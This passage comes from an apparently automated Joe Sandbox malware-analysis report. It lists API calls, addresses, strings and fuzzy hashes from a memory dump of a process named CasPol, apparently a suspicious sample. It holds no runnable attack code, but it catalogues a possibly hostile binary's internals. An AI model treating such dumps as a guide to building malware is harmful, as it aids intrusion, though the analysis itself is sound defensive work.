                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                    • String ID: }A
                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                    APIs
                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3056473165-0
                                                                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: d
                                                                                                                    • API String ID: 0-2564639436
                                                                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: BINARY
                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp
                                                                                                                    • String ID: /stext
                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2445788494-0
                                                                                                                    • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                    • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcmpmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1065087418-0
                                                                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1381354015-0
                                                                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004301AD
                                                                                                                    • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpymemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1297977491-0
                                                                                                                    • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                    • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2154303073-0
                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3150196962-0
                                                                                                                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                    APIs
                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$PointerRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3154509469-0
                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4232544981-0
                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859505661-0
                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                    APIs
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
